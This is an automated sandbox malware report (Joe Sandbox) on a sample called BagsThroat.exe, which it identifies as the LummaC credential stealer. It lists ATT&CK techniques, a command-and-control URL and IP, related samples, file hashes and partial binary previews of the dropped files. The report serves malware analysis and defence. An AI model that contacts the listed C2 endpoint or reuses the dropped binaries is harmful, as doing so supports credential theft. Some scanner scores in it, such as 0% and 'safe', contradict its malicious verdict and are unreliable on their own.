      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
      Windows Management Instrumentation      		1
      DLL Side-Loading      		12
      Process Injection      		111
      Masquerading      		2
      OS Credential Dumping      		22
      Security Software Discovery      		Remote Services11
      Input Capture      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		22
      Virtualization/Sandbox Evasion      		11
      Input Capture      		22
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection      		Security Account Manager3
      Process Discovery      		SMB/Windows Admin Shares31
      Data from Local System      		13
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS13
      File and Directory Discovery      		Distributed Component Object Model1
      Clipboard Data      		Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets35
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      BagsThroat.exe24%VirustotalBrowse
      BagsThroat.exe18%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Managers0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://crackerdolk.click/api0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      crackerdolk.click
      		104.21.80.1
      		truetrue
        		unknown
        yHUkiJhYyguIo.yHUkiJhYyguIo
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://crackerdolk.click/apitrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/XNoted.com, 0000000D.00000000.2054497861.0000000000985000.00000002.00000001.01000000.00000007.sdmp, Noted.com.2.dr, Heights.9.drfalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorBagsThroat.exefalse
              		high
              https://www.autoitscript.com/autoit3/Noted.com.2.dr, Tim.9.drfalse
                		high
                http://www.teamviewer.comBagsThroat.exefalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  104.21.80.1
                  		crackerdolk.clickUnited States
                  		13335CLOUDFLARENETUStrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1581567
                  Start date and time:2024-12-28 09:12:05 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 20s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:BagsThroat.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@26/23@2/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 25
                  • Number of non-executed functions: 40
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 2.16.164.105, 2.16.164.72, 20.242.39.171, 13.107.246.63
                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:12:53API Interceptor1x Sleep call for process: BagsThroat.exe modified
                  03:12:58API Interceptor9x Sleep call for process: Noted.com modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.21.80.1SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                  • www.dejikenkyu.cyou/pmpa/
                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                  • hiranetwork.com/administrator/index.php
                  downloader2.htaGet hashmaliciousXWormBrowse
                  • 2k8u3.org/wininit.exe

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSronwod.exeGet hashmaliciousLummaCBrowse
                  • 104.21.92.219
                  ronwod.exeGet hashmaliciousLummaCBrowse
                  • 172.67.198.222
                  installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                  • 172.67.166.49
                  Loader.exeGet hashmaliciousLummaCBrowse
                  • 172.67.132.7
                  Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                  • 104.21.66.86
                  Script.exeGet hashmaliciousLummaCBrowse
                  • 104.21.66.86
                  48.252.190.9.zipGet hashmaliciousUnknownBrowse
                  • 104.21.95.219
                  https://haleborealis.comGet hashmaliciousUnknownBrowse
                  • 104.22.72.81
                  External2.4.exeGet hashmaliciousLummaCBrowse
                  • 104.21.29.252
                  Aura.exeGet hashmaliciousLummaCBrowse
                  • 104.21.66.86

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  a0e9f5d64349fb13191bc781f81f42e1ronwod.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1
                  ronwod.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1
                  installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                  • 104.21.80.1
                  Loader.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1
                  Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1
                  Script.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1
                  Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1
                  External2.4.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1
                  Aura.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1
                  Aura.exeGet hashmaliciousLummaCBrowse
                  • 104.21.80.1

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.cominstaller_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                    SoftWare(1).exeGet hashmaliciousLummaCBrowse
                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                        ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                          JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                              FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                installer.batGet hashmaliciousVidarBrowse
                                  skript.batGet hashmaliciousVidarBrowse
                                    din.exeGet hashmaliciousVidarBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com

                                      Download File
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):947288
                                      Entropy (8bit):6.630612696399572
                                      Encrypted:false
                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                      MD5:62D09F076E6E0240548C2F837536A46A
                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                      • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                      • Filename: !Setup.exe, Detection: malicious, Browse
                                      • Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse
                                      • Filename: JA7cOAGHym.exe, Detection: malicious, Browse
                                      • Filename: appFile.exe, Detection: malicious, Browse
                                      • Filename: FloydMounts.exe, Detection: malicious, Browse
                                      • Filename: installer.bat, Detection: malicious, Browse
                                      • Filename: skript.bat, Detection: malicious, Browse
                                      • Filename: din.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\S

                                      Download File
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):487086
                                      Entropy (8bit):7.99964339288111
                                      Encrypted:true
                                      SSDEEP:12288:RtTVjKXTKbjRPFuStuOCxV1HhFD3AA8/bJl7Y:Rt9STGjRYS0PPH7D3cbJl7Y
                                      MD5:F11BB6FE0674DB89C1F028537EE8BF79
                                      SHA1:242C35ABE1C29D5F8F9AF3ED9C6FED7989636DF2
                                      SHA-256:CBCE7E0E3E4758A98B555424349F4AD6DDA6E6D76B5D3102A9587064BCAFD8D6
                                      SHA-512:2393665F4976F2D014743144D149311E5128561BD8F1C643A6352515B6791BB421CBF3C4B7D333986678E2C2C03D975D0530781051504673A6926F1C9F58FC2B
                                      Malicious:false
                                      Preview:2..)..QZ7B.......:z...`./.e...W......3j<n..(O.s#...Dz..A...F.7j-....KFM..]...S....!.jb80...u.(o........BK.`9GF.[S.mU...j...K..!..........r....B.)!....n7.i.q.tqpKof....J5:.i..A3..'5.Eq.>./._.e..z.=.v...\3L...Q=.J;v)...m8{..<...Ze..@1$..=..e..\w@.U=P.7............G.}..p@.|.._.S^.j.....'7t..bE.6h?.....?..-...^..'.[T^.l..F....r.....?.:gB..R..6...:Jg......{^.C1...a>I.P...........n.'Q..o)...........N..s.}.i..k........ .;......;.......U...S7.9.Q........K~J../.'......y_-8...E.~0]4.r&..V....&.#...d...R..v..8.gT..k....|v.n../..&.1m.......=..`Wr.k(...2.A5 I.FM>b......L.33..t...3.b.>..;.b..[.N.C...y0s.e.g...y.6P..[$%...lN.....B..PT|f.....3.$....{..;..#...S.f.M2..S..P.9Z.S...X.Y..s.eC-..P..,.z.o..1*...h..Ph:...n....yz%.P.em...9.[/:.I...C........D..T.u...w....~>..'...H..6jzp@.3VO...!N.#e]...t~CL...x.I.....K.>S...'...L...q:.t......r..W>......7xFFW........S..{+N.G...XFv.~...R.....V.K.g......R...\s.._!.&T..P.h.....~...aB.o,.G:zbX.........q....A...!.....dL.p....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Barely

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):75776
                                      Entropy (8bit):6.678076006949304
                                      Encrypted:false
                                      SSDEEP:1536:MJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukL:MBRtNPnj0nEoXnmowS2uq
                                      MD5:DAF32A4C4FEFD3D5535967B25263E8BD
                                      SHA1:167FEADA002AA0FDE95F5B07DD210DEE233C3EEA
                                      SHA-256:AF1A7ED88CDE109A083819CCB9B518C64AE54F23BD8DC479A33538C09B7D2000
                                      SHA-512:D8D5AE48277D1DBD622BA4B58F0D8D3A38EBA8C9122BFC326257CE9CD0469B7124403148F593DACCD561BF69EBEABE06BA51001FCD57B8EB5DCD7B17B9A26724
                                      Malicious:false
                                      Preview:..K...q;.r.}.].E..U...C.u..u(.E..].;]...j....u..M..].U...~.+.U..........},..tK..~G..t...........j...[+.3.;.......|.=.................+.;..................B..E.........U(.u......u.J .z....+.}.j.....f.7^...}...t&.M....f......u.3.....+....}.f.....}.R.u.W..b...u.........x....M............U(..+....B<.z..J ..G;.w.4w.._;.s=3.9E......E.......}(f..f..f.M.G j.f...O ....O ...X...._;.r.E.u.].....E..U.....E........u..]..tC.u.j._...+...A...+...B...u........CjxXf.......f....f.B...u.u..u..U...&...U.......Z...C.....+....f;.t...f;.....u..}....t......f..f;...;........f;...-....},.u3..3...P.u(...u..m*.......u...F.jw.4FXf9.t...f....U...........f;.u...G...jw[f9.G.Z..F.t.f............}........f;.t.f;.t..A.j{f..Xj.f..[.o.u...3..u(f..+..u.....j.[............6P.G.WP..y...U....3.j.X.....f;.....j{...I.........f..Xf....F.f....U.f.G..E..t......f..9]...\%..3..E..R%...E..yf...0....E..yf...6%.......f;...5%...E............E...u..U...%...M...u....u..Cb...Cd.U.j.Y.D;E.u..Cf..;M.u....t.U..Ch

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Boolean

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):126976
                                      Entropy (8bit):6.40709763067582
                                      Encrypted:false
                                      SSDEEP:3072:bDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNQ:6O5bLezWWt/Dd314V14ZgP0JaAOz04pC
                                      MD5:FDE0B2F5092759C166D9ADF73DAFFC1A
                                      SHA1:4FF851F5BD76377F622BB20BEDBF8B6319337272
                                      SHA-256:4ECCFFB45EB2D61C23001C2964278D71BEE01564BCEB53EBDF244952F71B0FA6
                                      SHA-512:916223830CAB7E9275EC5B319D2FB65328EBC2B1B13636F4A971623AECC2B364E6F6019DF129F4D6F99B3D67970E2F0D97DF90808331F6AAC03469CB8638ED32
                                      Malicious:false
                                      Preview:.....u...M...M...]..I..I..:N..."......G.......&.....E.S.E...B...Y..PS..6...}..........}...G.......tK.u..&..Y.@...P..D:.8L:.t..@8.@......D:.8L:.t..@8.H....>....t..w...`.I..g.....!2....u:.M.E.P.....,...H..|9...D9.t..@8.@......|9...D9.t..@8.@.._^3.[....U..E.VW..d....@........QQ..$W.E.P.T....}...u.t..E...P.....3.G..3.........F.....3..>_^]...U..h:.G.hD.G.h..G..u..u..O...]...U..M..E.....t0...@..E..E...y.....L..]..E.......D{..I...E......E.. ...]...U... SVW..M.h..I.....u..F........3.~...].v..N..I.......E....U..~..v..N..I.......E....U..E.d...QQ..$W.E..}.P.>....u............U..........}....t.j..u..U....}....u..U....E..}..uD.M......M..\K...........u....M.j.W.2...W.l$..Y.M..E.P......M..k.....j..u..H....3....}..,...H..|....D..t..@8.@......|....D..t..@8.@....../....u6.E...P.4....)...H..D..8T..t..@8.@......D..8T..t..@8.P._^3.[....U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.C_...'..N._^]...U..V......K......v..r#...E..Yt.j.V..#..YY..^]...U..V.u.W.N.....J...N.....J...u......N....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Button

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):67584
                                      Entropy (8bit):6.526950976284279
                                      Encrypted:false
                                      SSDEEP:1536:Q1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUp:QZg5PXPeiR6MKkjGWoUlJUp
                                      MD5:5E14DE8FA9A19756C788C622E0EDC1C3
                                      SHA1:D333353E8019085B145EAF35C1F7A177C42A722E
                                      SHA-256:6EBC3AC86AF22FDCCCAC1B35F6B43EEB4B90274567E7914390FCE79735EABBE4
                                      SHA-512:0459B57B3CDA520D9F269635F20F96322A7D1F21C268140AAF866E212A076757B14E4BDE2D56C7DECCB31FBF9350B3BD798BE6A7E2F95632DF7D10316E2F2E55
                                      Malicious:false
                                      Preview:......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Classic

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):94208
                                      Entropy (8bit):7.997921706643346
                                      Encrypted:true
                                      SSDEEP:1536:5X3dDr1Pu9cXpA4d+XBlNjyeUdokigm0BXI+fWzaVMXZm++qAkHZImLYUVa91ovp:5XxFu9cKXadokF1fWza+w+fHZImLYUgU
                                      MD5:3C9D72E13D302192E829854491F1A500
                                      SHA1:1DFAD70C96FE7064FDC2C13742970B3D3B1FDAED
                                      SHA-256:D9EA9FFD874A8DA9B640F8C47499194261813C00DC660B48BDECE3E4D1D66C20
                                      SHA-512:94BE92932145290E8C9CDD1BED1F0D2EA82EC133182806ABCB2B815491B43EE7885D42583CFDFB4FEDFA506946802DB54BECBE3FA595A2B0D0010CCF7E6BF828
                                      Malicious:false
                                      Preview:..............._..H.....ZI..a..M.^.Z.>....4V..M..Y.........A.n.X..}.I...5.g.$\$...........PcU.dW..D... u.C.W.P.}.._|.X.s.Pu.E}.l...ox...."e.P/.D..H.j+P..]#8..Hl.nv$.6B...2.._.T...3....->=.^ij......@...a......].8......I..a..9........9..jA.&....S~...2...S.8#..;3.......=1.Rr\..@....i.2d^~{.x#........."4...v...-.....th1.0f.!dN.n..>.@....y_..%..xP]@.Y....^....S......L..J.Qr'..(}..Ac.1....t2[..$$.......qj.K.E....>...m..K..*...QmL.....i'.@..........@.}O.h.....8lp..r.l0...1.@T}.C.w. .Fz.D.sm..=.O.Y..?.4..}]!..w..L..QPA.P........j..T..........{Q,.,..j.3..~...A..:P..w../(..n...{b.a.............0$o...CHb......)....:......:.W''M>.%...M..].yn_..m....k.E..7..g............%...;....f..@.l..,..]oW.g=rd...p._x.N5Q.?.j.zy.a...;]q{..jX@.5.W........hN.Ad&...A.V...........p..v....M..!.K.4<,?.........J3..VK..n.....n:"....y.....C.q..E.8.P....\..L..F.5....:.. -X..~6.$/5..9..?...2..^qa......:x|.6c.<h6>x...s#._..w.2.@X.,.k..J.m*.#...E...Oel."..n....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Colored

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):73728
                                      Entropy (8bit):7.997730679197705
                                      Encrypted:true
                                      SSDEEP:1536:fk5XgJkNbNRTnUUJu1zaPqltpZWgOa9xC7pxfnyyqFZTsY2C:aXwkNTTne1GKjZHOOgxvyyqFZTr
                                      MD5:B7CECE3F1D2BF71379B06ACDB83F059F
                                      SHA1:6D8DCA5DA7B9CF6EEE41A7778BBD07DB19DBA3F5
                                      SHA-256:DE477736DB9C540B2C160D3B7EB77E5165D3C143A9FEECFCE05424279A52C5AB
                                      SHA-512:F29013F35FC0EFCEDC0721B926389183CBE9BAAB5ABE50943AFEDB8AB40E92B71F6C459A3E49D7BDE30D84050FDF8934797B16D6CA734E292C5591AFE0FAF653
                                      Malicious:false
                                      Preview:.`.......#9.A.d.6..e..2.>..P9.)m.4...OQ.~.I..a.H..r..}'......%.[\.5c;I(%..Of.vz...b7.......gp.&..>.&..L .S%K9}6.OY..^..x:..B..y.`zw..*.@..U....W..Ai.......Bt...a.8X..%.|..n.a.%..n.'v.-z......$b7-.Yw... .,h\.=...7~p..&8..z@g.d.H.^5....".e.!].h>..aH..si.(.......!...R..hN&.....S.....r.J.k...{..,D.3....ZYx...Gj.....xsr5...7.....:...;..k.!._...-..fT.....MQe.(gB.xP.\ ....$d.I.!.&.....`.%.%....y0..._....0d..r'...~;7I....>.".V.C........eG.U:@G......2.0.j....2n..K.c.Hq(.....Xz.7.I..b........Y.UR .~)....5.u...Z..D....2....rG.;Z..he!......W..w...Y..gR.\..Lhk.>..-pi......J.va.)..:A..E...g..K&...-...$.^H....vw~o...[p.-2.."~.'%r...k....Z.^.U...So#....,......[.@a.Xg.J.W...n...\)....^{R..3....>.;..K.m5/X...H.U.9Q...oC..erQ........j.AS[.y....'5..a|F.D..:.E.g.......g..:..R......,..3.I...H..M|...6;!..%.l5A\.!j.\.....%.#vUQ<K>.i...m.2 /5GH.....W..yxDa9..5.H.7.(..4.'....#y}.+..;....g.#."F....f7l.....@..E..gTY..(.......)s.H.f..n...<....Q*...$V<.Z....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Continued

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):15022
                                      Entropy (8bit):7.9870833060716615
                                      Encrypted:false
                                      SSDEEP:384:Xohr0DChCBOtbstzLR2Ztk71pls/F4Cm8gjNVPp:XsYehOwsVV8tkhE/F4CsX
                                      MD5:5EDF8B76F5259F18AC5B48A9BE7D5A9C
                                      SHA1:9FA0B847524EC85B1F3B9568E755E175A0204E34
                                      SHA-256:B27080EEDFAC5BF6EC956EFAC77A20BC52C95B9FB95AE5F0E29349C260523B35
                                      SHA-512:235F1ABEBC2DE5B73D6CC8B6EFAE008E2362C8EECF565862070502DF253F1460863219AEBADEF74BD84387ED618820A49E76B0C691C58EBD59FA1A358C7112E1
                                      Malicious:false
                                      Preview:.n.ZD....2,?^....r=.+.)...3.......3.ld. .Fm...G.....l..N.G.3[.<9.....H. R..q`....\.'H]..?.p.'..O4.....'._{).8=6...`../}.fG..N...'.s......u...ysk.r....*..h4~..P....h....o......f.U0...>.j.'.8FS........I..f;..%...d....s.....7.(.$l$.I...O2.i.&....*X(.VQ.o+...1.m.z.l..I.^l......Se.4..u....M....."......T.=...;;..Z..............F...a[qJW.6..a...[.{.=.u......#..:.`...|l.7...(.....{KR@..._..s.'.3\.Np.6wS.....%..1._M...e5.q.....r.yW]|...W)............IfP..;..s..H..?...w..~h.\..q...aAb.7pN.E.'...0:}..m.k..o8.;z...E.&........D..e..........3....</-..{=.......u.U...VaI.8.=..+..n!]~m.='t..r...u..bm..b...r.I.Hf..H.jw...w..Y.D...d..r&........m.C.L...V...l<.f..._...E.T/.M>.1.....*.%..U....4^.o|.....W.....$ v.....K./..>*._/%.0D..yW...q.V..Q.....e.{..$.-E.?.k...x.].....Q.......S.N.?i..J.xs.m`.ul...>rs....-8....G1OU.../QC.J:.Re....H...u.1....^...%.....0..Te.JQ<.N.V.d.)..(....,..TX.nY/.N......Y.M....fV..T+W..Oc.F./:..:.X=...W...p..P?...M..Ag....../0...D>&..,.

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Discovered

                                      Download File
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:Microsoft Cabinet archive data, 487716 bytes, 11 files, at 0x2c +A "Button" +A "Pledge", ID 6344, number 1, 29 datablocks, 0x1 compression
                                      Category:dropped
                                      Size (bytes):487716
                                      Entropy (8bit):7.998707506288359
                                      Encrypted:true
                                      SSDEEP:12288:YOlgWJ8WJAxkstcqtqoD9a6EAxHEG1RMEfggIr5BrZhG:YOlgWJ9AnlqoD9NSQythG
                                      MD5:83AEC38FA4C64D2200448897B0627859
                                      SHA1:10585CDB45E5EA30FFDDF0368047D46768C107C4
                                      SHA-256:F618451D85B98F254DF7F0DEB79E21EBFD30EBD9F53A018BE3AD2BA61738C889
                                      SHA-512:6AF38129C71DEF5BE13E1778A30C2EA1706A6F475551AE99D53ED43C9B21D2CFCFCCEAE6605B8075AB13EAFC52F9632F15F79283F947210FB122448976E6A20F
                                      Malicious:false
                                      Preview:MSCF....$q......,...................&..................Y.\ .Button..p.........Y.\ .Pledge.....x.....Y.\ .Tim......5.....Y.\ .Speeches......A.....Y.\ .Managers.s....E.....Y.\ .Eat..4..`H.....Y.\ .Ve.....`|.....Y.\ .Michael..(..`p.....Y.\ .Barely.....`......Y.\ .Boolean.....`......Y.\ .Heights.y..S..CK..T..8|7{......`.Q...mdA..4..&(..!.DH..i\.S.]........~...U1.b..R.....$(..T#..+.......`...s.&.>}........s...3.......$.J...<G.....V......A.N..Nx...|.7..... ..aH..'I5..0............_^$.W.......%..k..Z.Wc.[..U_....L....v1.S-&...b1.RHy.S.Q.,[.T.s.D...l......F...B.s...H..%4...j....!.1a..p...c.&,..=3f....=d..NJ-.ZoZ...k..]..W$.1s.s..Q...9..S0g.68J.p.,i.I....2/L.?o.$..&.R.O()....P..b.%A..x.E.Q.....I......AS<I.WPR.......k%I.(|.....@L...>=...~.X?A.B.5.r.,.N..@........G*..K..W$...{..SL.F*.@..>..G.C./.u..?.$...Ae/@e.6..j.d....*....../.R[....d.+Y..*,l..U...4V..*lb..$....Ud...hu.jb..XE.s.g.7s-b......1.r...}...Ah..m.0.w...Y[.....n.(..#....6..5.Nk[6C.n.h[.my.xD..6....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Eat

                                      Download File
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):627
                                      Entropy (8bit):4.281494712266738
                                      Encrypted:false
                                      SSDEEP:12:D2+8yGSG+fCtJfjEvadTfA43k66h1ICdC3v6cl/:Dh8yGS9PvCA433C+sCN/
                                      MD5:5F4A17BEC8C80C80333C6A4A319E6690
                                      SHA1:23D9E2E0F30329A75A6AE74761BA07DD77F307E8
                                      SHA-256:B9F971DB06DA104D3BA7C18E733B7D50DA01C2A91BFCCB5F6433BE6B7321E933
                                      SHA-512:A22F4BDD193C9C62CE6BE0E14DE18F8EE12BCA0BC65AE5583227ABD92E400C1A464176127815267519F0552344AFD9A65B399E1906A8CDFAA4668A91AF2CABAD
                                      Malicious:false
